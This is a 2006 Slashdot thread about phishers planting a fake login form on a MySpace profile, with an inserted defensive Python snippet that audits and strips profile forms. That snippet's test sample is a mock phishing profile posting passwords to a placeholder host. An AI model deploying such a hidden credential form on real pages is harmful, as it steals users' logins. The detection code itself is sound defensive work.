MySpace Accounts Compromised By Phishers

Posted by kdawson on Sun Oct 29, 2006 01:20 PM
from the even-the-wary-beware dept.
An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.
  • by AVryhof (142320) <avryhof AT gawab DOT com> on Sunday October 29 2006, @02:02PM (#16634080) Homepage
    Maybe it's been my fault it's taken so long to "discover"

    I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

    I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.
    • Re: (Score:2, Funny)

      by Anonymous Coward
      Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.
    • "Dear diary... mood? Apathetic."
  • Widespread exploitation of myspace could cause up to $6 dollars in damages
  • Finally (Score:3, Funny)

    by 1310nm (687270) on Sunday October 29 2006, @02:09PM (#16634128)
    Keep up the good work, phishers!

    The secrets of apathetic teens will soon be aired for the world to view!
    • Not quite. (Score:1, Informative)

      by Anonymous Coward
      "Despite public perception, most MySpace users are over 35, according to a release today [05 Oct 2006] by ComScore. The stat-tracking company says that as MySpace continues to grow, its user base is skewing older - teens accounted for around 25% of users in August 2005, but now only represent 12% of the audience. Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year."

      http://www.comscore.com/press/release.asp?press=1019 [comscore.com]
    • .. which seems to be the most popular with the angsty crowd. MySpace, on the other hand, is the single largest concentration of insanity, drama and nonsense ever, surpassing even LJ. I'm not kidding - just try browsing through some of the comments and profiles on MySpace and you'll lose all faith in humanity in the space of about five minutes.
  • by Anonymous Coward on Sunday October 29 2006, @02:13PM (#16634170)
    OpenDNS people started http://phishtank.com/ [phishtank.com] service which is completely community based, as you can actually see the phishes and verify them, I have seen some amazing stuff around. Compromised servers having SSL certificate which are abused in phishing operation, some pages having fake addressbar on top and most important of all, USA based banks are being phished from USA cable modem subscriber (haxored) and nothing done against it for days.

    BTW, as it is free to use, SURBL added it, so now the stuff which you verify actually helps people using that free list.
  • MySpace is dying
  • As much as they will beat this feature to death over the next few months, it will only deter the least sophisticated methods. Most of which are already history.

    Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.

    Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?

    I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.
    • If you're implying that MySpace is Web 2.0 I'd have to disagree. MySpace may be great for 'social networking', but from a technical point of view it's a nightmare. Malformed HTML, non-degradable Javascript, code injection issues... it's like a bad joke.
  • http://www.myspace.com/login_home_index_html [myspace.com]

    Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.

    Next!?
    • Re: (Score:1, Insightful)

      by Anonymous Coward
      Seems Myspace has fixed it.

      No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.

      Expect to see a large number of variations on this to show up in the next few days/weeks.

  • by kihjin (866070) on Sunday October 29 2006, @02:24PM (#16634254)
    FTA:

    The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

    Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

    So the summary and the article itself is slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.
  • With MySpace being so popular and with its users regularly logging in on a daily basis, I wonder what the impact of this was in terms of:
    1) the total number of "phished" accounts
    2) the number of "phished" accounts in terms of a percentage of the total userbase.
    • Possibly not many, since less than one third of all MySpace accounts are active.
      • Really? Where did you get this information? I haven't seen this information published anywhere... but would love to see where this info comes from.
    • I used to host a free web hosting service. And as you can imagine it did attract some unsavoury characters - one of the accounts was used as a MySpace phishing account, it was only on-line for 1-2 days before I managed to catch and ban the account, but in this time it did manage to obtain details for over 2000 individual logins - whether or not all of these credentials worked or not I can't say for sure. I tried contacting MySpace offering over these credentials but I didn't receive an e-mail back.
  • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?
    • You clearly didn't read the Washington Post article.

      The 16-year-old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next morning at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

      That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays
      • The 16-year-old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next morning at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.
        Ah yes but mom and dad would do so with a different account and password and home directory, right ?
        Huh ? Right ?

        Guys ?
        • Because they could edit MySpace pages to include code that does silent, drive-by malware installs on the machine of anyone that pulls up that page on an ill-maintained Windows box. Those machines would get pwned and could then have keyloggers installed on them to gather more useful info, or could be used to send spam, perform DoS attacks, etc.

          Yes, the phishers could create MySpace accounts/pages from scratch, but their work pays off much more quickly if they co-opt the pages of frequent users with large, we
    • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      People login to myspace with an email address and password.

      If a person used the same password for their email, then not only is their email compromised, but via their email, the attacker gets a list of other potential sites to try.


      I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run
    • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and that bulletins one of your favourite singers or friends say "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was advised to you by someone real (a "friend" or an artist you like), than when you

    • According to Tom [myspace.com] (the guy who runs Myspace, I think) spammers can use login credentials to send spam to friends of a user. There are also screenshots on Tom's blogpost - it seems the best workaround so far is instructing users to type myspace into the address bar themselves before logging in.
  • I clicked a myspace profile link in a friends bulletin which sent me to what I thought was the login page (I failed to check that hostname was indeed login.myspace.com) The login didn't appear to work and I attributed it to myspace being down at the time. It wasn't till later that I noticed I had posted a similar bulletin with a similar link (though that profile was already dead by the time I checked it). As far as I can tell the only thing they did was post a bulletin to try to get more accounts. I was abl
  • Another danger of getting username/password combinations is that so many people use the same username/password EVERYWHERE. Once a thief gets the username/password for ANY site, even a completely useless site with nothing of value, they could then do a systematic login attempt at all the common sites and banks where you might be able to do some real damage.
  • It's not these little phishing sites that scare me, it's the banking\credit union sites. For example, http://www.wamucards.com/ [wamucards.com] (DON'T ENTER YOUR INFO HERE!).

    How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/2046225 [slashdot.org] In cases like these, I guess it makes sense
    • Re: (Score:3, Insightful)

      How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/2046225 [slashdot.org] In cases like these, I guess it makes sense

      When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

      Besides, Verisig

    • Re: (Score:3, Interesting)

      I'm confused. Here's the domain registration for wamucards.com:
      Registrant:
      Washington Mutual, Inc. (DOM-1398425)
      1201 3rd Ave Seattle WA 98101 US

      Domain Name: wamucards.com

      Registrar Name: Markmonitor.com
      Registrar Whois: whois.markmonitor.com
      Registrar Homepage: http://www.markmonitor.com/ [markmonitor.com]

      Administrative Contact:
  • This is really old news. Phishers have been around myspace for ever. They used to use embedded flash with action script to redirect and myspace upgraded to flash 9 which allows the server to restrict flash redirects ( a feature added at myspace's request). They mostly use the phished accounts for myspace spamming and botnet-worm distribution.
  • if people had just installed Firefox 2
  • My girlfriend's account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.

    I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one time only type deal. Of course, an attack like this could be potentially worse, hell I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.

    The des

  • I tried to visit www.myspace.com/login_home_index_html and it appears the account has been taken down.

    Either that, or, that's what these scammers want us to think?
  • Those who may be wondering why phishers used MySpace.

    1. It is a good way to get information about the user
    2. Good way to get information about the user's friends.
    3. How many PC-illiterate people use the same password for multiple accounts?

    I have already added the following line to my hosts files:

    216.178.32.51 greentea420.iespanna.es
  • Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

    War is fun when you hate both sides.
  • (Generally young) people with no desire to gain any technical understanding of securely maintaining responsibility over their own information use an (invariably) insecure operating system to access a web site designed specifically to make someone very rich by feeding advertisements at the same people in a way that makes them feel like "one of the pack" whilst divesting the site owners of any responsibility for that personal data by offering the service as "free".
      • Re: (Score:2, Informative)

        No shit I just slapped myself after doing just that ... MOD ME DOWN and burn me at the stake!
    • Re: (Score:1, Funny)

      by Anonymous Coward
      Jep, the testosterone is definitely tumbling....
    • Security conscious people use MySpace? Who knew...

      There's even a Slashdot group [myspace.com] on it actually. And as security conscious as I am, I didn't see what was wrong with the first two example screenshots on Tom's blog about phishing [myspace.com]. I think that if I went through one of these fake login-page profiles I might have fallen for it, just because I don't expect to get phishing from a page on the genuine site itself. Lots of people in my MySpace friends fell for it, and almost half of the bulletins in my bulletins lis

      • Indeed, but the whole use of HTML/CSS is what draws a lot of kids (and some adults) to the site is to make it really their space. The numerous myspace profile HTML/CSS generators out there make it point and click for the regular user.

        I suppose they could avoid this problem in the future by stripping FORM tags from the editable parts of users profiles. That would keep this from happening again, but might break some really custom (not even recognisable) myspace pages.
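kihjin's comment above checked the genuine form's action by hand, and the comment just above proposes stripping FORM tags from the editable parts of profiles. As an added example (not code from Slashdot, Netcraft or MySpace) that does both, the Python below flags any form in a constructed profile snippet that asks for a password but posts anywhere other than login.myspace.com, and re-emits the markup with form-related elements removed while leaving the content-hiding CSS alone; phish.example is a placeholder host, and the login host list is an assumption drawn from the comment.

```python
# Added example (not code from Slashdot, Netcraft or MySpace).
from html.parser import HTMLParser
from urllib.parse import urlparse

LOGIN_HOSTS = {"login.myspace.com"}  # hosts a genuine MySpace login form posts to
FORM_TAGS = {"form", "input", "button", "select", "textarea"}
# Constructed sample profile: CSS hides the real content, a bogus form asks for the password.
SAMPLE_PROFILE = (
    '<style>.real{display:none}</style><div class="real">Tom &amp; friends</div>'
    '<form method="post" action="http://phish.example/collect.php">'  # placeholder host
    '<input name="email"><input type="password" name="password"></form>'
    '<form method="get" action="/search"><input name="q"></form>'
)

class FormAuditor(HTMLParser):
    """Records each <form> (action, asks for password?) and rebuilds the markup without form elements."""
    def __init__(self):
        super().__init__(convert_charrefs=False)  # re-emit entities exactly as written
        self.forms, self.cleaned, self._cur = [], [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur and (a.get("type") or "").lower() == "password":
            self._cur["password"] = True
        if tag not in FORM_TAGS:
            self.cleaned.append(self.get_starttag_text())
    handle_startendtag = handle_starttag  # <br/> style tags: emit once, no closing tag

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None
        if tag not in FORM_TAGS:
            self.cleaned.append(f"</{tag}>")
    def handle_data(self, data):
        self.cleaned.append(data)
    def handle_entityref(self, name):
        self.cleaned.append(f"&{name};")
    def handle_charref(self, name):
        self.cleaned.append(f"&#{name};")

def audit(html, login_hosts=LOGIN_HOSTS):
    """Return (suspicious actions, sanitized html): suspicious = asks for a password but
    posts outside login_hosts (a relative action posts to the profile host, so it counts)."""
    p = FormAuditor()
    p.feed(html); p.close()
    bad = [f["action"] for f in p.forms
           if f["password"] and (urlparse(f["action"]).hostname or "") not in login_hosts]
    return bad, "".join(p.cleaned)
```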
    • When we first came across this information a few days ago, it was also linked to Mashable.com [mashable.com], which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).

      Filtering based on blacklists (as you are suggesting M